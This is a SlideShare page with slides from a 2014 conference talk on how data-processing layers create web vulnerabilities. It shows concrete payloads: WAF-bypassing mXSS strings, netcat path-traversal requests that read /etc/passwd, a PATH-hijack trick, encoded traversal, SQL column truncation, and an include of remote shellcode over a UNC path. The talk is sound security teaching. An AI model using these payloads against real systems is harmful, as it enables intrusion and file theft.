SlideShare una empresa de Scribd logo

Vulnerabilities in data processing layers across request handling

Descargar como PPTX, PDF
B
beched
SoftwareTecnología
1 de 38
Vulnerabilities in data processing layers Omar Ganiev PHDays 2014 Moscow
whoami • Beched (ahack.ru, @ahack_ru) • Math student • RDot.Org (CTF) team • Penetration testing expert at IncSecurity
Intro • Application’s behaviour is defined not only by its code, but also by a plenty of external factors such as environment • We’ll try to dig into different layers of data processing and point out the potential dangers which are often ignored by developers
Program? Turing machine!
Real program • A lot of inputs • User supplied input • Operating system environment • Hardware • We‘ll talk about general situation and will pay specific attention to web applications
Web application interaction Browser Web server Application
Web application interaction Browser Web server Framework Database Application
Request processing layers • Hardware • Operating system • Browser • Network • Web server • Framework • Application • Database • File system
Request processing layers • In general case: Hardware OS Client Network Server
Data processing • Each layer has some inputs and outputs • Each input and output is somehow processed, normalized, filtered, etc • Developers often consider only the user inputs, which are explicitly defined in the code • Other problem is that often output contains sensitive information which is used as an input for some functions
Input/output trust • Which input can be trusted, and which one is user-controlled? • Which input is secret, and which one is contained in output? • This is not always clear • Let’s observe each abstract layer and look at input and output processing weaknesses
Hardware layer • Input from pseudo devices /dev/random , /dev/urandom in Linux is not always safe, see http://www.blackhat.com/presentations/bh- usa-06/BH-US-06-Gutterman.pdf • Speed of system clock quartz crystals depends on the temperature. This creates a side channel (clock skew) for attacking anonymity systems: http://www.cl.cam.ac.uk/~sjm217/papers/ccs0 6hotornot.pdf • Cryptanalysis via various physical side channels
Operating system layer • int main() { system(“id”); } • Safe? No! There’re no inputs in application, but there’re inputs in environment • PATH=.:$PATH • Put shellcode in ./id and run the executable • Real-world example: CVE-2013-1662, unsafe popen of lsb_release file in suid vmware- mount binary
Operating system layer • External libraries provide another input point • This results in such attacks as DLL injection and hooking • CreateRemoteThread, SetWindowsHookEx, etc in Windows • LD_PRELOAD in Linux
Browser layer • Browser makes a lot of transformations of the data • The purpose of transformation is standard compliance (like RFC, W3C) • The transformations are often done after input validation by web application • Breaking standards leads to various client-side attacks
Browser layer • XSS, UI redressing, URL spoofing, HTTP response splitting, open redirects via the single HTTP parameter – Request-path: https://rdot.org/forum/showthread.php?t=25 96 (by @black2fan) • Browsers incorrectly treat Location response header and inject malicious data into Request- path
Browser layer • Mutated XSS (mXSS) is an attack on the output • Browsers compile non-valid HTML pages into some canonical form • The transformations can be quite weird: https://cure53.de/fp170.pdf • More examples: <listing>&lt;img src=1 onerror=alert(1)&gt;</listing> <img src= alt=“ onerror=alert(1);//”> • Try at http://html5sec.org/innerhtml/
Browser layer • All the checks and input validation are typically done on the server side • Hence, mXSS can bypass such checks and WAF • Consider signature-based filter (for example, in CMS Bitrix) • We can encode bad words in the following mXSS payload for IE: <listing>&lt;img src=1 o&#x6e;error=alert(1)&gt;</listing> • This is rendered into <img src=1 onerror=alert(1)> and bypasses WAF
Network layer • TCP timestamps can reveal various information (see Hardware layer) • Network administrators often forget about internal recursive DNS servers, which makes it possible to transfer data in DNS tunnel, bypassing firewalls
Web server layer • HTTP daemon should verify validity of the packets • Fields should meet RFC rules • But can one assume that this is the case and trust any HTTP header field? • No! Apache is a typical example of the software, which breaks the rules
Web server layer • Let’s discover Apache magic $ echo a | nc localhost 80 • 400 error? Nope, the index page is loaded. Note this: ["SERVER_PROTOCOL"]=> string(8) "HTTP/0.9" ["REQUEST_METHOD"]=> string(1) "a" ["QUERY_STRING"]=> string(0) "" ["REQUEST_URI"]=> string(0) ""
Web server layer • Often $_SERVER[‘REQUEST_URI’] is used in file inclusion, can we perform a path traversal (not in QUERY_STRING)? Example: <? $docroot = $_SERVER['DOCUMENT_ROOT']; $url = explode('?', $_SERVER['REQUEST_URI']); $path = substr($url[0], 1); $parts = explode('/', $path); if($parts[0] == 'assets') { readfile("$docroot/$path"); exit(); }
Web server layer • Okay, let’s try: $ echo 'GET /../../../../../etc/passwd' | nc localhost 80 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>400 Bad Request</title>
Web server layer • Here comes double-slash magic: $ echo -e 'GET xassets/../../..//etc/passwd' | nc localhost 80 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh … • Clearly, this should not work, but it works. You should not trust the web server data processing!
Web server layer • Similar constructions are often used in MVC projects to parse the controller and action values. Example from the article in Xakep magazine (167): $piecesOfUrl = explode('/', $_SERVER['REQUEST_URI']); … $controllerName = $piecesOfUrl[1]; … include $fileWithControllerPath;
Web server layer • Looks like secure, but what if someone launches this on the Windows box with Apache? • The following payload will then include myfile.php: GET a/................myfile/..// • There’re lots of such code snippets on GitHub (vulnerable to file inclusion via REQUEST_URI, not necessarily under Windows)
Web server layer • The Host header is also untrustworthy, since the usage of $_SERVER[‘HTTP_HOST’] can lead to logical vulnerabilities • For instance, spoofing of the password restore link • See http://www.skeletonscribe.net/2013/05/pract ical-http-host-header-attacks.html
Web server layer • This was all about input. What about output? • Web servers reveal current server time (Date header), static files’ modification time (Last- Modified header) • This can be used to predict the PRNG seed in PHP (using also PHPSESSID cookie value): http://habrahabr.ru/company/pt/blog/149746/
Web server layer • Also consider the following code: function genid() { mt_srand(time()); $h = fopen('entropy', 'r'); $fstat = fstat($h); fclose($h); return md5(mt_rand() . $fstat[ 'atime' ] . $fstat[ 'mtime' ]); } • An id generated by such a function is insecure: an attacker can obtain mtime from Last-Modified header and atime -- by accessing ‘entropy’ file and reading Date header
Framework layer • Do not always trust frameworks! Not every method is secure, read the source code and documentation • Insecure Ruby on Rails methods: http://rails- sqli.org/ • Rather popular Yii class with a lot of find*() methods without SQL injection protection: https://github.com/yiisoft/yii/blob/master/fra mework/db/ar/CActiveRecord.php
Framework layer • Example of insecure data processing inside the framework CakePHP: http://www.securityfocus.com/archive/1/527974 /30/0/threaded • The data (PATH_INFO variable) is first validated and then decoded, thus it’s possible to bypass the check: /theme/Test1/%2e.//%2e.//%2e.//%2e.//%2e.// %2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//% 2e./etc/passwd
Database layer • DBMS store data in the fields with particular format (VARCHAR, BLOB, TEXT, INT, etc) • Each format has its own limitations, thus, an input data is transformed – trimmed or truncated • SQL column truncation attack can lead to compromise of any user account in the system: INSERT INTO `users` VALUES (‘admin x’, ‘password’);
Database layer • PHP function addslashes can be bypassed: http://shiflett.org/blog/2006/jan/addslashes- versus-mysql-real-escape-string • This is due to charset transformations, when MySQL connection uses multi-byte charsets like BIG5 or GBK
File system layer • In PHP there’re a lot of weird file path normalization algorithms • FindFirstFile WinAPI method allows to pass wildcards instead of exact paths to include functions under Windows: https://rdot.org/forum/showthread.php?t=926 • For example, this will include C:boot.ini: include 'C:<oot"<<';
File system layer • In old version of PHP: /etc/passwd///[x4096]///.php = /etc/passwd ; /etc/passwd///// = /etc/passwd • Open_basedir bypass via glob wrapper: http://ahack.ru/bugs/php-vulnerabilities- exploits.htm • The path glob://… is first considered as relative and then is converted into URL
File system layer • Allow_url_include and allow_url_fopen bypass via UNC path: include '//IP/path/shellcode.txt'; • Security checks are performed before transformation into remote UNC path
Outro • Interaction with program goes through different layers, and each layer has its own parameters and data processing rules • The rule: first formatting, then validation • Each variable, which is not explicitly set in the code, should be treated as a potential source of malicious data
Thanks for attention! Questions? admin@ahack.ru beched@incsecurity.ru

Recomendados

Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trendsbeched
 
Entomology 101
Entomology 101Entomology 101
Entomology 101snyff
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railssnyff
 
Ln monitoring repositories
Ln monitoring repositoriesLn monitoring repositories
Ln monitoring repositoriessnyff
 
Finding Needles in Haystacks
Finding Needles in HaystacksFinding Needles in Haystacks
Finding Needles in Haystackssnyff
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
 
Owasp tds
Owasp tdsOwasp tds
Owasp tdssnyff
 
Ruxmon cve 2012-2661
Ruxmon cve 2012-2661Ruxmon cve 2012-2661
Ruxmon cve 2012-2661snyff
 

Recomendados

Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trendsbeched
 
Entomology 101
Entomology 101Entomology 101
Entomology 101snyff
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railssnyff
 
Ln monitoring repositories
Ln monitoring repositoriesLn monitoring repositories
Ln monitoring repositoriessnyff
 
Finding Needles in Haystacks
Finding Needles in HaystacksFinding Needles in Haystacks
Finding Needles in Haystackssnyff
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
 
Owasp tds
Owasp tdsOwasp tds
Owasp tdssnyff
 
Ruxmon cve 2012-2661
Ruxmon cve 2012-2661Ruxmon cve 2012-2661
Ruxmon cve 2012-2661snyff
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsIvan Novikov
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)Ajay Negi
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!Soroush Dalili
 
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...adonatwork
 
BruCon 2011 Lightning talk winner: Web app testing without attack traffic
BruCon 2011 Lightning talk winner: Web app testing without attack trafficBruCon 2011 Lightning talk winner: Web app testing without attack traffic
BruCon 2011 Lightning talk winner: Web app testing without attack trafficAbraham Aranguren
 
Efficient Context-sensitive Output Escaping for Javascript Template Engines
Efficient Context-sensitive Output Escaping for Javascript Template EnginesEfficient Context-sensitive Output Escaping for Javascript Template Engines
Efficient Context-sensitive Output Escaping for Javascript Template Enginesadonatwork
 
FUZZING & SOFTWARE SECURITY TESTING
FUZZING & SOFTWARE SECURITY TESTINGFUZZING & SOFTWARE SECURITY TESTING
FUZZING & SOFTWARE SECURITY TESTINGMuH4f1Z
 
Html5 hacking
Html5 hackingHtml5 hacking
Html5 hackingIftach Ian Amit
 
DEFCON 23 - Jason Haddix - how do i shot web
DEFCON 23 - Jason Haddix - how do i shot webDEFCON 23 - Jason Haddix - how do i shot web
DEFCON 23 - Jason Haddix - how do i shot webFelipe Prado
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?snyff
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF qualssnyff
 
BSides Lisbon 2013 - All your sites belong to Burp
BSides Lisbon 2013 - All your sites belong to BurpBSides Lisbon 2013 - All your sites belong to Burp
BSides Lisbon 2013 - All your sites belong to BurpTiago Mendo
 
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securitySecuRing
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementAndrew McNicol
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Web Hacking With Burp Suite 101
Web Hacking With Burp Suite 101Web Hacking With Burp Suite 101
Web Hacking With Burp Suite 101Zack Meyers
 
Introduction to Penetration Testing
Introduction to Penetration TestingIntroduction to Penetration Testing
Introduction to Penetration TestingAndrew McNicol
 
Securing the Apache web server
Securing the Apache web serverSecuring the Apache web server
Securing the Apache web serverwebhostingguy
 
Securing the Apache web server
Securing the Apache web serverSecuring the Apache web server
Securing the Apache web serverwebhostingguy
 

Más contenido relacionado

La actualidad más candente

Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsIvan Novikov
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)Ajay Negi
 
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...adonatwork
 
BruCon 2011 Lightning talk winner: Web app testing without attack traffic
BruCon 2011 Lightning talk winner: Web app testing without attack trafficBruCon 2011 Lightning talk winner: Web app testing without attack traffic
BruCon 2011 Lightning talk winner: Web app testing without attack trafficAbraham Aranguren
 
Efficient Context-sensitive Output Escaping for Javascript Template Engines
Efficient Context-sensitive Output Escaping for Javascript Template EnginesEfficient Context-sensitive Output Escaping for Javascript Template Engines
Efficient Context-sensitive Output Escaping for Javascript Template Enginesadonatwork
 
FUZZING & SOFTWARE SECURITY TESTING
FUZZING & SOFTWARE SECURITY TESTINGFUZZING & SOFTWARE SECURITY TESTING
FUZZING & SOFTWARE SECURITY TESTINGMuH4f1Z
 
DEFCON 23 - Jason Haddix - how do i shot web
DEFCON 23 - Jason Haddix - how do i shot webDEFCON 23 - Jason Haddix - how do i shot web
DEFCON 23 - Jason Haddix - how do i shot webFelipe Prado
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?snyff
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF qualssnyff
 
BSides Lisbon 2013 - All your sites belong to Burp
BSides Lisbon 2013 - All your sites belong to BurpBSides Lisbon 2013 - All your sites belong to Burp
BSides Lisbon 2013 - All your sites belong to BurpTiago Mendo
 
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securitySecuRing
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementAndrew McNicol
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Web Hacking With Burp Suite 101
Web Hacking With Burp Suite 101Web Hacking With Burp Suite 101
Web Hacking With Burp Suite 101Zack Meyers
 
Introduction to Penetration Testing
Introduction to Penetration TestingIntroduction to Penetration Testing
Introduction to Penetration TestingAndrew McNicol
 

La actualidad más candente (20)

Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application Firewalls
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
 
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
Frontend Security: Applying Contextual Escaping Automatically, or How to Stop...
 
BruCon 2011 Lightning talk winner: Web app testing without attack traffic
BruCon 2011 Lightning talk winner: Web app testing without attack trafficBruCon 2011 Lightning talk winner: Web app testing without attack traffic
BruCon 2011 Lightning talk winner: Web app testing without attack traffic
 
Efficient Context-sensitive Output Escaping for Javascript Template Engines
Efficient Context-sensitive Output Escaping for Javascript Template EnginesEfficient Context-sensitive Output Escaping for Javascript Template Engines
Efficient Context-sensitive Output Escaping for Javascript Template Engines
 
FUZZING & SOFTWARE SECURITY TESTING
FUZZING & SOFTWARE SECURITY TESTINGFUZZING & SOFTWARE SECURITY TESTING
FUZZING & SOFTWARE SECURITY TESTING
 
Html5 hacking
Html5 hackingHtml5 hacking
Html5 hacking
 
DEFCON 23 - Jason Haddix - how do i shot web
DEFCON 23 - Jason Haddix - how do i shot webDEFCON 23 - Jason Haddix - how do i shot web
DEFCON 23 - Jason Haddix - how do i shot web
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF quals
 
BSides Lisbon 2013 - All your sites belong to Burp
BSides Lisbon 2013 - All your sites belong to BurpBSides Lisbon 2013 - All your sites belong to Burp
BSides Lisbon 2013 - All your sites belong to Burp
 
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces security
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability Management
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Web Hacking With Burp Suite 101
Web Hacking With Burp Suite 101Web Hacking With Burp Suite 101
Web Hacking With Burp Suite 101
 
Introduction to Penetration Testing
Introduction to Penetration TestingIntroduction to Penetration Testing
Introduction to Penetration Testing
 

Similar a Vulnerabilities in data processing layers across request handling

Securing the Apache web server
Securing the Apache web serverSecuring the Apache web server
Securing the Apache web serverwebhostingguy
 
Securing the Apache web server
Securing the Apache web serverSecuring the Apache web server
Securing the Apache web serverwebhostingguy
 
Adding Support for Networking and Web Technologies to an Embedded System
Adding Support for Networking and Web Technologies to an Embedded SystemAdding Support for Networking and Web Technologies to an Embedded System
Adding Support for Networking and Web Technologies to an Embedded SystemJohn Efstathiades
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101Jannis Kirschner
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...Hackito Ergo Sum
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknessesIvan Novikov
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsFelipe Prado
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesDefconRussia
 
Exploitation techniques and fuzzing
Exploitation techniques and fuzzingExploitation techniques and fuzzing
Exploitation techniques and fuzzingG Prachi
 
XML External Entity Null Meet 19_3_16.pptx
XML External Entity Null Meet 19_3_16.pptxXML External Entity Null Meet 19_3_16.pptx
XML External Entity Null Meet 19_3_16.pptxSamitAnwer2
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Oracle WebLogic Diagnostics & Perfomance tuning
Oracle WebLogic Diagnostics & Perfomance tuningOracle WebLogic Diagnostics & Perfomance tuning
Oracle WebLogic Diagnostics & Perfomance tuningMichel Schildmeijer
 
Operating system enhancements to prevent misuse of systems
Operating system enhancements to prevent misuse of systemsOperating system enhancements to prevent misuse of systems
Operating system enhancements to prevent misuse of systemsDayal Dilli
 
526_topic12_13.ppt
526_topic12_13.ppt526_topic12_13.ppt
526_topic12_13.pptImXaib
 
Play Framework and Activator
Play Framework and ActivatorPlay Framework and Activator
Play Framework and ActivatorKevin Webber
 
introduction to node.js
introduction to node.jsintroduction to node.js
introduction to node.jsorkaplan
 

Similar a Vulnerabilities in data processing layers across request handling (20)

Securing the Apache web server
Securing the Apache web serverSecuring the Apache web server
Securing the Apache web server
 
Securing the Apache web server
Securing the Apache web serverSecuring the Apache web server
Securing the Apache web server
 
Adding Support for Networking and Web Technologies to an Embedded System
Adding Support for Networking and Web Technologies to an Embedded SystemAdding Support for Networking and Web Technologies to an Embedded System
Adding Support for Networking and Web Technologies to an Embedded System
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknesses
 
Web Security
Web SecurityWeb Security
Web Security
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
 
Exploitation techniques and fuzzing
Exploitation techniques and fuzzingExploitation techniques and fuzzing
Exploitation techniques and fuzzing
 
XML External Entity Null Meet 19_3_16.pptx
XML External Entity Null Meet 19_3_16.pptxXML External Entity Null Meet 19_3_16.pptx
XML External Entity Null Meet 19_3_16.pptx
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Oracle WebLogic Diagnostics & Perfomance tuning
Oracle WebLogic Diagnostics & Perfomance tuningOracle WebLogic Diagnostics & Perfomance tuning
Oracle WebLogic Diagnostics & Perfomance tuning
 
Securing applications
Securing applicationsSecuring applications
Securing applications
 
Rails Security
Rails SecurityRails Security
Rails Security
 
Operating system enhancements to prevent misuse of systems
Operating system enhancements to prevent misuse of systemsOperating system enhancements to prevent misuse of systems
Operating system enhancements to prevent misuse of systems
 
526_topic12_13.ppt
526_topic12_13.ppt526_topic12_13.ppt
526_topic12_13.ppt
 
Play Framework and Activator
Play Framework and ActivatorPlay Framework and Activator
Play Framework and Activator
 
introduction to node.js
introduction to node.jsintroduction to node.js
introduction to node.js
 

Más de beched

Attacks against machine learning algorithms
Attacks against machine learning algorithmsAttacks against machine learning algorithms
Attacks against machine learning algorithmsbeched
 
Hacking as eSports
Hacking as eSportsHacking as eSports
Hacking as eSportsbeched
 
BlackBox testing
BlackBox testingBlackBox testing
BlackBox testingbeched
 
Data mining for nmap acceleration
Data mining for nmap accelerationData mining for nmap acceleration
Data mining for nmap accelerationbeched
 
[DagCTF 2015] Hacking motivation
[DagCTF 2015] Hacking motivation[DagCTF 2015] Hacking motivation
[DagCTF 2015] Hacking motivationbeched
 
Find maximum bugs in limited time
Find maximum bugs in limited timeFind maximum bugs in limited time
Find maximum bugs in limited timebeched
 
Криптология в анализе защищённости
Криптология в анализе защищённостиКриптология в анализе защищённости
Криптология в анализе защищённостиbeched
 
Воркшоп по анализ защищённости веб-приложений
Воркшоп по анализ защищённости веб-приложенийВоркшоп по анализ защищённости веб-приложений
Воркшоп по анализ защищённости веб-приложенийbeched
 
Blackbox-тестирование веб-приложений
Blackbox-тестирование веб-приложенийBlackbox-тестирование веб-приложений
Blackbox-тестирование веб-приложенийbeched
 
Пост-эксплуатация веб-приложений в тестах на проникновение
Пост-эксплуатация веб-приложений в тестах на проникновениеПост-эксплуатация веб-приложений в тестах на проникновение
Пост-эксплуатация веб-приложений в тестах на проникновениеbeched
 
Что общего у CTF и тестов на проникновение?
Что общего у CTF и тестов на проникновение?Что общего у CTF и тестов на проникновение?
Что общего у CTF и тестов на проникновение?beched
 
Алгоритмы пентестов. BaltCTF 2012
Алгоритмы пентестов. BaltCTF 2012Алгоритмы пентестов. BaltCTF 2012
Алгоритмы пентестов. BaltCTF 2012beched
 

Más de beched (12)

Attacks against machine learning algorithms
Attacks against machine learning algorithmsAttacks against machine learning algorithms
Attacks against machine learning algorithms
 
Hacking as eSports
Hacking as eSportsHacking as eSports
Hacking as eSports
 
BlackBox testing
BlackBox testingBlackBox testing
BlackBox testing
 
Data mining for nmap acceleration
Data mining for nmap accelerationData mining for nmap acceleration
Data mining for nmap acceleration
 
[DagCTF 2015] Hacking motivation
[DagCTF 2015] Hacking motivation[DagCTF 2015] Hacking motivation
[DagCTF 2015] Hacking motivation
 
Find maximum bugs in limited time
Find maximum bugs in limited timeFind maximum bugs in limited time
Find maximum bugs in limited time
 
Криптология в анализе защищённости
Криптология в анализе защищённостиКриптология в анализе защищённости
Криптология в анализе защищённости
 
Воркшоп по анализ защищённости веб-приложений
Воркшоп по анализ защищённости веб-приложенийВоркшоп по анализ защищённости веб-приложений
Воркшоп по анализ защищённости веб-приложений
 
Blackbox-тестирование веб-приложений
Blackbox-тестирование веб-приложенийBlackbox-тестирование веб-приложений
Blackbox-тестирование веб-приложений
 
Пост-эксплуатация веб-приложений в тестах на проникновение
Пост-эксплуатация веб-приложений в тестах на проникновениеПост-эксплуатация веб-приложений в тестах на проникновение
Пост-эксплуатация веб-приложений в тестах на проникновение
 
Что общего у CTF и тестов на проникновение?
Что общего у CTF и тестов на проникновение?Что общего у CTF и тестов на проникновение?
Что общего у CTF и тестов на проникновение?
 
Алгоритмы пентестов. BaltCTF 2012
Алгоритмы пентестов. BaltCTF 2012Алгоритмы пентестов. BaltCTF 2012
Алгоритмы пентестов. BaltCTF 2012
 

Último

SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsSensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsChristian Birchler
 
Post Quantum Cryptography – The Impact on Identity
Post Quantum Cryptography – The Impact on IdentityPost Quantum Cryptography – The Impact on Identity
Post Quantum Cryptography – The Impact on Identityteam-WIBU
 
Comparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfComparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfDrew Moseley
 
Best Angular 17 Classroom & Online training - Naresh IT
